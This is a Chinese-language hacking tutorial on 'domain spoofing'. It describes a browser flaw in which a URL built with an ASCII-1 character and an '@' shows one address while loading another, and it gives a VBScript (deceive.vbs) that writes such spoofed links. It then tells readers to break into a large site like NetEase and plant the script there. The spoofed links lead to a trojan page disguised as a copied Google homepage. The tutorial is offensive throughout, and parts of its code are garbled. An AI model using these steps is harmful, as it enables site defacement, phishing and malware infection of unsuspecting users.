域名欺骗技术

网页木马种植方案一直都存在很大的问题,当然欺骗需要技巧也需要时间,我们现在不需要那么麻烦的欺骗,本文就是教大家利用最新浏览器漏洞实现域名的欺骗.....
前言
域名欺骗有多种实现方法,本文所说的是利用客户端浏览器的漏洞来欺骗用户 。
多数浏览器都会存在这个漏洞,目前暂时还没相应的补丁 。漏洞是这样的:
当用户通过浏览器访问一个url,如果这个url是经过以下的格式构造的,那么浏览器实际将访问经过构造的恶意页面,而用户浏览器的地址栏里所显示的将是虚假的url:
url的构造格式为:
_1][special_char]@[url_2]/ target=_blank>http://[url_1][special_char]@[url_2]
说明:
url_1为用户所看到的地址,地址中不可以带/
special_char为一个特殊的字符,即ascii码为1的字符
url_2为恶意页面地址
利用过程
首先请看这个测试页面:

域名欺骗技术实例

你可以看看这两个链接有什么区别:

链接1:
链接2:www.163.com target=_blank>http://www.163.com/; target=_blank http://ww ... ;>www.163.com


这个网页源代码,其中链接1指向了一个vbs脚本,而链接2指向的是163站点 。如果我们把连接一的vbs脚本改成下列代码:
""""""""""""""""""""""""""""""""""""""deceive.vbs"""""""""""""""""""""""""""""""""""""""""""""
"(以下请根据实际情况自行修改:)
url1=http://www.163.com/
url2=http://www.google.com/
text=http://www.163.com/
url=_blank ?>http://;&url1&chr(1)& ... p;url2&
dn=/
mouseover=onmouseover=javascript :window.status="_blank ?>http://;&url1&dn&"
mouseout=onmouseout=javascript :window.status=""
click=onclick=javascript :navigate("&url&")
style=style=cursor:hand
tag=&text&
document.write tag
"说明:
"url1是用来欺骗用户的地址.
"url2是实际访问的地址,可以是网页木马、恶意网页等.
"text是链接的文字.
"注意:(以上欺骗地址及实际地址不可以加http://)
"""""""""""""""""""""""""""""""""""""""cuts here""""""""""""""""""""""""""""""""""""""""""""""""
现在大家看到了吧~~当我们点击这个测试页面的时候,链接1指向的是google.com,而且状态栏和地址栏里都显示_blank>http://www.163.com/,链接2却指向163.com 。你也许感到不可思议,但这就是域名欺骗漏洞的魅力 。
我们可以想象,如果以上的测试页面中的链接1指向的不是google.com,而是我们的网页木马,那就......
不过,一个普通的个人网站没人会看的,这就需要我们把这种假链接添加到别的大网站的页面之中 。假设我们入侵了一个比较大的网站,比如网易(哇~~~~~~这时候一只菜鸟推着一车砖头,看着我......) 。这时候就可以把它的页面给改了 。
比如有一个文字链接,我们就可以把代码中的xxxxxx改为我们自己的代码: 。看到src属性里的deceive.vbs了吗 ?我们要编辑好这个文件,然后上传到要修改的页面目录下 。
这样还不行,我们还要把自己的木马网页的界面修改一下 。也就是把原来链接到的页面加入到我们自己的木马网页,并且我们的木马网页里的所有链接等内容要和原来的页面一样,否则就会引起用户的怀疑 。现在,我们把google网站的首页源代码全部复制下来,添加到我们的网页木马 。把复制下来的代码中的图片或者是链接的文件都修改完整,比如logo.gif改为_blank>/UpLoadFiles/NewsPhoto/comalogo.gif,否则网页就和原来的不一样了(图片显示为红色的×,链接也失效),因为用户打开的是你的站点,而你的站点中并没有logo.gif 。都修改好后就可以保存文件了 。上传到你的网页空间里 。

推荐阅读